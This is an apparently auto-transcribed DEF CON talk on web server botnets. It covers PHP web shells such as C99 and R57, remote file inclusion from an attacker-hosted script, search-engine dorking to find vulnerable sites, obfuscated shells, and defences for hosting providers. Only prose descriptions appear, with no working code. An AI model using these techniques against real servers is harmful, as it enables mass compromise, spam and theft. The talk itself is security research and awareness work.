 Good morning. I hope you all had a good day's sleep. I hope your headache isn't killing you too much. And if you don't have a headache, you're doing that wrong. Sorry, but... So, thank you for coming. And let's get started. The name of the talk, as you can all read, is basically a web server botnet and hosting farms as attack platforms. If you expected a botnet talk, which I never give, this is semi-botnets. It's not really. The real name of this talk should probably be completely cross-platform web malware. It's not. So, let's just get started. Who I am? My name is Gadi. Hi. Nice to meet you. Hey! I do a lot of stuff that's related to a botnet, fuzzing all around, really. And I work for an Israeli company called Beyond Security. A lot of vulnerability assessment. So, let's get started. Regular malware. And, guys, I'm really using simple definitions here. So, if you're in the antivirus world, do not kill me, please. Just trying to get some basics going around. So, regular malware, and this is a disclaimer so nobody can say I'm wrong. Often. Okay, anybody can say I'm wrong, but you get the point. So, platform-specific, meaning it's written first for the operating system, right? It would run on Windows, it would run on Linux, or whatever other platform you would like. So, that's the code, the binary code. It's compiled for that, whatever else you want to it today. Then, it propagates. I believe most definitions would say most malware propagates, of course, not always. Trojan horses don't need to propagate, but you get the point. They can use, sorry? I would actually like to hear that comment if you can please share it with the rest of us. How dare I always wanted to say that? Okay. This is DEF CON. So, I'm going to take my regular talk, insert a lot of fuck shit, asshole. Fuck shit, asshole. So, if anybody... No, seriously, if anybody... Shut up. So, if anybody is offended in any way, I would honestly like to apologize to you and ask you to leave the room. This is DEF CON, and this is the way I'm going to speak, and I apologize if you don't like me, but hey, if the world doesn't. So, let's go through this. Let's get started. So, platform-specific, yeah. Propagates use vulnerabilities, you know, web server, mail client, remote accessible service. And you can also use social engineering or user availability or stability for DEF CON. And, you know, send you some email saying, hey, this is a really cool picture. You got to click on that, and they would. Everybody knows that. And here are some things that are not always true. It propagates randomly, meaning I can choose some addresses by some other means, but usually I'll just try and get... As many samples out there as I can by blindly trying to infect everybody, and then some. And then usually, although there is no technological reason for this to be different, if not work, it would affect desktop systems. I can infect the server, but mostly the systems will get infected by these viruses malware, whatever you want to call them, or desktops. So web server malware. Completely cross-platform. As long as there is actually a web server over there that supports scripting. It propagates by the use of Google. I'm sorry, I like Google. Any search engine. But this is DEF CON. And... But usually these people use Google. And you can try searching any search engine saying powered by PHPBB. Actually now Google has this thing autocomplete, so just do powered by and see the list of stuff that pops up. Really interesting. So you search Google, find some web application that you know has vulnerabilities, and blindly try to infect them. And these are... And other differences. It propagates from a pre-selected genetic pool. Again, not always. There are other ways of doing this. You can just blindly go and try to attack different servers. Are you actually filming me? No? Okay, so that light is nothing to do with... Anybody's been here at DEF CON in 2005? Anybody gone to the Mudge Talk? Yeah? No? It's Mudge, there was no abstract. But let's go back to the issue. And it affects servers. Which means it can infect desktops. It's not very likely because most desktops should not run web servers. But it usually affects servers rather than desktops. So here is an example of some simple script that you just enter the string you're looking for in Google or some other search engine, MSN, Yahoo, etc. And you find a ton of victims. Pretty neat. Could be done manually, but this is cool. In URL, by the way, very powerful search tool. So let's just look at what this means. Malware, bots, etc. So web malware is cross-platform. And so far, this is the interesting part. Infected a ton, and by ton I mean thousands and thousands of web servers all out there already to be controlled. No DSL machines, not dial-up machines. I'm not saying these botnets are gone. But web servers. And what the attack platform means, and again, if you don't remember, this is actually the name of the talk, lots of web servers. Just consider all these co-location facilities, the server farms, hosting providers, unbelievable amount of servers with a lot of users on the same machine. And if even one of them runs some insecure web application, which we all know happens, and this is still kind of obvious, then the entire server is compromised. Just to be clear about this presentation, I'm going to talk about a lot of stuff we already know. And let's just go over the stuff we already know. So there's been a lot of work about PHP shells. It doesn't have to be necessarily PHP. It could be ASP. It can be written in parallel as far as I'm concerned. And generally, very well explored, we all heard about them or should have. Inclusion attacks, or RFI, thoroughly explored. And we have seen a lot of shells, actual shells out there, such as the R57 shell, or as Joe Stewart called it, Spam through, which was very interesting. He showed actually an entire botnet that sends a lot of spam, about 57,000 servers sending a ton of spam out there. Most of it was shares, running shares, or stocks, whatever you want to call them. And this was done purely by these web servers on the R57 shell. Guys, if you want to go all the way to the back because I can hear you. Yeah, yeah, you too, up in the front. Okay, let me try this. Hello! Yeah, you too. Thank you. No, no problem. Can you share? What does the bag look like? Oh, hey. There is a reward for a bag. Anybody has a bag? Or is anybody a douche? I don't care. So, other... I mean, PHP shells. Okay, let's get started. PHP shells. I don't know if you've been to any of my talks before. Five minutes, I just peaked shit out of my ass. So, you're leaving now. You only cared about your bag. Okay. So, PHP shells we know of. RFI attacks we know of. R57 shell, which was analyzed. We have seen these shells and actually looked at them. We know of them. So, why am I talking about this again? Why am I talking about this together? So, there is no other significant work or no work whatsoever done in this field up to a few months ago, which was in February. And the paper this presentation is based on was written. There have been some works by a guy named Jamie Raiden. I hope that's... I pronounced his name and about web... but nothing really significant beyond that. So, new work. There is my work in cooperation with which is web server botnets and server farms attack platforms. That was in virus bulletin on February. And, of course, the great guys in that project with know your enemy web application threats. This web server threats with shells was a very small portion of the work, but still very interesting. Good guys. And now let's talk about why this is even interesting. Why this is new. So, the injection. Okay, I'm not talking about this is new. The injection. So, let's actually read this. File inclusions are vulnerabilities. Okay, let's not read this. File inclusions are vulnerabilities in web applications which can allow an attacker to execute a script by including a file in an existing script. Okay, blah, blah, blah. There is an include command, constink xss right across the scripting that's one instruction or something like that. And there are other types of vulnerabilities in post, in the URL any type of mobility you want to think about that can also help you include code. And we can even upload file upload vulnerabilities. Anybody has file outload enabled in their web application blog? Not a very good idea. After a lot of discussions and arguments, we decided to enable file upload in a blog I hope to contribute to and the very next day we got compromised because apparently somebody that actually secured the file upload issue made sure that people who reached the script can use it because the authentication test was commented out. You never know. Never trust upload from web. So, injection. You inject entire scripts into the current code. We know of that. And what injections look like? As you can see here, for example, you have whatever URL you've got, right? This is a URL because it has two URLs in it. And you basically use the script, you include some other something that's going on from badguy.tod malware.cmd, and badguy.tod is basically where the bad script will be hosted and you injected it. No matter what exact vulnerability we're actually talking of right now, it could be in WordPress, it could be in PHPP. This is how most of them look and the result in PHP code, actually this should be the other way around, is that the PHP code is above, but this is what it will look like. Get and the page, right? Inside your script. And the interesting thing is whatever this may look like, actually code as your web server to act like a client. You go out and you download a script to your web server. Your web server serves the net. Now, unrelated to this particular threat of foul inclusions, why should you allow your web server to serve the net? Basic rules. If we all follow the basic rules we would have no problems, so main types of web server malware. We've got a lot of scripts out there. Just consider, in the past when you wanted to have control of the server you would maybe have a shell. Maybe you have the computer connect to you as a connect back shell. But all these nice guys just came out and said, well, you know this old web thing going on now with web applications and maybe web 2.0? And why should we have to type? Especially when there is a port that's always open because it needs to serve the public. That's port 80. We can connect to the web server, type in a URL to a file we injected into the web server and have a GUI have a web GUI a user interface for our shell. That's much cooler, isn't it? Again, nothing new there. So we have other types, not just shells. We have what I call foothold grabbers, which are beached basically. Hey, you got control, now start uploading stuff and do whatever you want. We have the remote shell, which is basically a library compromise tool. Run this command, download that, upload that, do this, whatever you want to do. And then we are starting to get to what this lecture is actually about, which is the bot. If we can upload scripts to do whatever we want and this would of course run with the privileges of the web server why shouldn't we upload bots? These are servers, strong lines, strong machines. We can use them. And we can use them for different things. It could be anonymous messaging, right? Somebody's on the phone right here. Guys, if you want to talk, go to the back. The cool people sit at the back. I never sit at the front. So anonymous, did I just say I'm cool? That's deduction in the Newton way. Okay, so you would have loved me. So anonymous messaging, you can spam, you can do defasements. Consider where this all started. Anybody ever visit Zone H? Shut up, warning wood. So all these defasements out there, people figured, hey, why should we just deface the page? Are you videotaping me? Can you turn off the blinking thing at least? No? Thank you. So why should we just deface these websites? We're a Chinese government organization. Or if it's a website for some club, biking club in San Diego, we should be able to do more with this. This is a resource. Let's use it. Web 3.0. I don't think so, no. At RSA, actually, somebody came and said, so what I've learned in this conference is identity 2.0. And I was, oh my God. Identity 2.0. So anonymous messaging, spam, defasements and then let's make use of all this. Let's use these web servers that are so easy to hack into and get a bot in there. Or not. We can do things that are much easier. Just upload some sort of shell that lets us spam. And it lets us spam many different emails and we can copy paste these emails in. Or not. Let's do something else. Yeah, same thing. Okay, it's not exactly the same thing but it's in different language. This is interesting. Your email, reply to, blah blah blah and then all the way on the other side of the room now. So all the way on the other side of the room you'll have to figure it out for yourselves. Over there on the right there is load addresses from MySQL or for those not in the States MySQL. Isn't that cool? Now this was actually the server I took this from this shell connected to a server in France which had a lot of remote databases on it of addresses. We're starting to see more advanced use now. So let's look at this web shell. It's called C99 shell and there's a lot of versions out there. I can't even begin to count them. Actually I did, 33. I didn't count last month and there's a lot of stuff that authors didn't write and stuff like that. But as you can see here we basically have Linux machine running Apache PHP 4.4.2 and this scrolls down there are many other pages. You can do pretty much whatever you want with that machine. It's yours, you own it. So I actually did kind of speak out my ass and discuss file injections and PHP shells. Where are the botnets? So let me ask you a very serious question. Can somebody tell me what a botnet is before I continue? In most cases violate other people's systems and add an actual application the route in the server for some purpose you're for some purpose you're did you say gay something? Oh a web page. I hear out my ass we're taking over some other servers or collect the processes run commands okay let me define what a botnet is. Not that you're wrong what you're wrong and the reason is definitions in the security industry are so much fun we can define everything 20 different times for 20 different things and we would always argue about it the cheapest type of well anyway what's a bot? Can anybody tell me what's a bot? A robot what? A zombie machine what? Software robot. Defining what a botnet is is something I'm still not able to do after over 10 years of working on it because consider it could be just one machine connecting to a command control server being controlled but it could be 10 machines all from the same net or let's consider if it's one machine and it has 2, 3, 20, 200 different samples of bots installed it could be 20 different botnets not all these botnets are always active so how do we find a bot? For now let's define a bot as a trojan horse why? Because it is trojan horse and I'm not going to really argue about the definitions is some sort of software and this is taken from the something FAQ or newsnet if I remember it correctly I'm completely ruining it right now I read it 10 years ago is some sort of software that if you knew about it existing or some of the things that it does you would not approve of it as a user that's a basic trojan horse and let's add to that and say that most of these are remotely controlled which means if you have a trojan horse you own it it's completely compromised it's yours yes you can't kick it when it doesn't work but it's yours you can pop the CD open you can spam you can anonymize everything through it and that's fine and then you say I have 10 of these I have 20 of these I have 100 of these I have a million of these how do I control all of these together? it becomes a little bit of a logistical problem all these different trojan owned machines connect to me that's not a very secure decision to make because I can know who you are let's say you do it right now you choose some server with a simple protocol for example IRC which is a chat protocol most of us are intimately aware of it and all these bots will connect there and say hey I'm owned own me further server would be called a command and control server a CNC or a C2 if you're from the military and that's what a botnet is to me although it gets more complicated from that point on and the definition is important right now because this is an example from about 6 months ago this is a list of not very large lists about 540Ks of a text file and I can't read that but they basically list their shells as the attack URL as you can see for example the first one was a university in Taiwan and they had some sort of web application running over there you can see index.php etc and then you had the next one with the command.txt which is the second URI and that's the script they're injecting into that server makes any sense they're not listing the IP addresses they're not listing the URLs they're listing just the attack instructions and this for them is a shell which is very interesting new malware discovered not so new anymore this is the first the second time I've given this presentation in public and it's not really supposed to be extremely technical so I apologize if anybody is concerned it's more about the scale and there was a new version of C99 shell C99 shell tool modified by Cyco with a zero and you'll find quite a bit of those and we had up to two months ago about 243 unique samples when I say unique I don't mean somebody adding this was created by Cyco at the entrance at the footer or something like that small changes that somebody just took it and it makes no sense but completely different malware or variants of so 243 I ran it against a few antiviruses and at the time only about 20-40% were on average detected half of that were detected wrongly now I don't want to think about antivirus on the web server for the web server but ok for example 3 and I'm quoting the guy because he was very very excited this on his own isn't new but rather the way the program is delivered by using PHP's evil function and evil function the new variant hides itself in base 64 encoded block of data which is also encrypted the character are rotated so they don't appear to be in plain text now I don't know how many of you have ever seen this happening especially on bank websites but encryption which happens on the client side is not encryption any protection on the client side can be kicked or mutilated but still it's given us a lot of work instead of two minutes of reading the shell we need to spend some two or three hours on it to just understand what's going on but these guys finally noticed hey somebody is looking at us somebody realized we're taking all these different web servers and using them as bots back tools and why is that interesting so number two which was this one actually has a cnc channel for example this is not as big as it used to be a few months ago but you can google search c100.php and you'll find a lot of the different cnc's on the web itself through google and that's how it finds its command and control server on web search I'm sorry which is something that we have not seen before at that point at least me personally not on this scale and it was passworded again there's nothing to notice that we care I will tell you this point if you search for web shows you could find two blog entries a discussion on the incident incidents manual from 2005 a discussion on bug track from the early 2006 and some blog posts on Johnny Long's web server nobody cared so why is this important let's look low-cost toasting you have two to three sometimes five or six thousand websites per box any user can run any web application web applications mostly in php well you know open source i-availability php stuff very cool php has a ton of vulnerabilities and i mean really no php is secure no kidding i mean insecure no kidding so open source availability php is php's bad security and ugly code so combining the fact that yes the what asp.net okay i never used asp.net i never used php but just consider if you want low-cost hosting you go and pay 5 bucks 7 bucks 15 bucks 20 bucks more than that in your screwed why are you paying for that and you have some virtual hosting machine not even that that will cost more what am i talking about you have a shared environment with thousands of other users zero security or close to zero security because it won't pay for the provider to actually care about the security it's really difficult for providers to care about security when they don't get paid for it this is a problem really for once i'm not being sarcastic and then you share that server with so many different users or webmasters that love php and how many php application vulnerabilities do we see on backtrack per week until they started apparently filtering them i don't feel very secure suddenly because if any of these websites is compromised i'm compromised the machine is compromised and it's not good so 3,000 users any web application or script will run with the permission of the web server how do you run your web server anybody here who runs the web server runs it not as root really good going for that con now tell me how many once you're in the machine how many local exploits are out there just pre-legislation for the Linux kernel done with them once you have access even if you don't have root you'll get it and if you don't you'll usually be able to do whatever you want anyway you don't need that much of a high access level this is not about quality this is not about owning that server like in the good old days and discovering what's on it and doing stuff through it this is about quantity and then when you have so many different servers you have DDoSools just imagine the idea so what do we actually do about these attack platforms because this is really, really big we can try to detect it we can do VA scanning I hate saying that because it sucks but you can try running Nessus so something else that actually detects all these web things and try and see if how many of these things on my box doesn't help you much but hey, it's a start you can look for known beds on the system guys, girls, I'm talking about antivirus for web servers I'm sure that by this time next year we'll see one of the antivirus companies coming out with that patching user responsibility do you want your user who is paying five bucks per month to be in charge of patching their own web applications when honestly sometimes these web applications don't even have any patches out there as you well know a patch may not exist now how much do you invest do you contact the user and then just one of them do you patch the site meaning do you go and actually look for every web application on the server and patch it and try to keep up with it not very possible and what about the server itself do many of these service providers even patch their own servers for OS vulnerabilities you can do these things they will help but they're not perfect they do not fit low cost hosting you cannot spend all that time you can try and be reactive and treat some of these botnets but honestly some of what these have done they patched their systems they would choose just for example PHPPB or some other well known web applications that are problematic and just patch it out quietly without ever telling anybody not a very good solution it works for them to a limited degree so there are some small things we can do to try and make this better we can disable allow URL file open or URL include in PHP scriptable languages but this is for PHP we can try and run in virtual environment or truth users but what's the cost yet again pretty high doesn't really work don't allow surfing from a web server my god how many of us actually surf out of the firewalls to patch the checkpoint firewall or whatever firewall it is because we download it from the web we just look into our policies lately if we are not the people who do this most firewalls surf the web even if only to checkpoint or Juniper or whoever else you want to choose out there Cisco not a good idea there is more security and other such devices of application firewalls, IDSs, etc they help but pretty much useless in this situation in my opinion some of us may disagree I believe application firewalls are pretty much useless anyway but never mind what are your best practices what are your own do you allow your people to surf out what are the things do you do so quietly patch with applications or at least the most known ones I'm not sure that's a really good solution many people will like it's the only thing that works so far but it's not very good now let's boil it down a bottle filled with no escalation by the good guys is bad they did attack your IP addresses 85% of the time were the same IP addresses they did not use bots they did not use proxies they did not try to hide themselves the same people from the same IP addresses would again and again over a course of long time would be the same attackers worldwide which means there is an entire field out there that up to a few months ago and still just a few people are aware of this which is unbelievable are unopposed escalation reactionary attacks knee jerk reactions are never good but sometimes it's the best that we can do we can't wait for the civil bullet or whatever you guys want to call it so do we want to start an escalation battle? No do we want this bottle filled of web server botnets to be completely ruled by the bad guys do we want our web servers all around the world to be infected I mean you guys are in security have you ever seen the attacker coming from the same IP address maybe have you ever seen them do it worldwide from the same IP addresses 85% of the time when you look at your web server logs you look for many different things not for this many of your web servers I'm not talking about PayPal I'm not talking about Amazon.com these are very low-ending fruit vulnerabilities and these vulnerabilities equal plain and simple remote code execution for web servers and many of us are running these applications or basing our own applications on this 85% of the time we didn't even start the silly escalation war yet so we can compare this to SMTP the SPAM everybody was running around saying close your open relays this is not good guys do something about this SPAM ruled anti-spammers were few and far apart this is pretty much where we are today and the big guys don't have the money to cover it and we can concentrate the problem to these providers and in the news there have been at least two very large providers thousands of web servers of each of them with that many websites just this past year we have completely been owned entirely in the news how often do these things get to the news so we started the web aninet task force originally we called it the web aninet project but we didn't want to get in trouble with the aninet guys which are really nice guys so we haven't really done much in the past few months we searched our research projects and didn't really initiate any new ones but we have 14 members some of them are the biggest co-location facilities around and what we figure is if we gather this information we can gather the malware we can know about it we can not just see what infects us but around the world and prepare better for it we can discover the command control channels all these buttons just move on to web servers we are getting the same old IRC technology we can go to see solutions that actually work to a limited degree like ip blacklists without blacklists as evil as some of us may think they are the internet would not be here no the internet is not going to die tomorrow the sun will shine tomorrow this is not a cry wolf thing ip blacklist really kept the mail servers alive because they can't handle the load url blacklist that's the simplest thing we can get we can configure if this is an attack by urls we can just blacklist these urls same as ip addresses the same urls are still being used it's not as bad as it was a few months ago but still web server antivirus oh come on they will rebrand antivirus for this it's like they rebrand that make a few keeps rebranding its IPS so now they rebranding it for botnets it may work, I didn't like the idea so not saying anything bad about them so you can join if you like and do some research but let's talk about the impact just consider iis botnets linux botnets it's a new ballgame it's not just again, these are there and they are the main thing all these DSL and broadband cable bots all around they are the main problem but this is a new ballgame and this is from obvious to not so much iis botnets that's what i want to do so defacements, spam bots, stolen databases stolen databases are pretty important just consider if you have access to the web server why deface it, you can take the database that's useful and to be honest defacements, I don't know if you noticed on zoneh but some of these go away and the reason I noticed is about 6 months ago we started seeing forums, websites legitimate websites that you would enter and as an unspecified user you wouldn't even notice hey, what is animated cursor zero day doing on my favorite forum and why are they trying to infect everybody on the forum that's the defacements of today unless you want to do something like hey, you Israeli suck or hey, you Palestinians suck regular defacements type of stuff attack the web server put in the malicious code let users go on as usual just yet another way to infect people it's all low level noise we can't respond to all these millions of incidents out there anymore just when something really big comes along do we respond to it really so what it is about why this is new, it's the scale it's the cost and the fact that the bad guys just do whatever the fuck they want and again, knowing about PHP scripts is fine but there is close to no industry or community awareness of this again, it's Defcon I have to say it's fuck hey hey, questions? yeah we did, we do FIS buttons out there he asked why do people not see IS buttons and I'm saying this is not a Linux problem people do see IS buttons they are out there, you just need to look for them you're not aware, prove me wrong other questions yes SSL for command and control how frequently I have no idea I can pull a number out of my S but I honestly haven't really followed this for a while we can continue the conversation a little bit later other questions, anybody? yes use botnets for legitimate purposes try distributed.net I don't know yes what? these are not published but I have no reason to hide them I have the paper available online the one I wrote for virus bulletin same title I did not update it in a while no, sorry other questions yeah, anybody? yes I did not really distribute the primary sources of attack by countries but since that matter online, since when? I mean, yes, that's cool data but I personally have not found it to be useful to see where the bots are located what? yes sorry I do not have that data available right here yes any questions? thank you very much for listening and I'm sorry I didn't say enough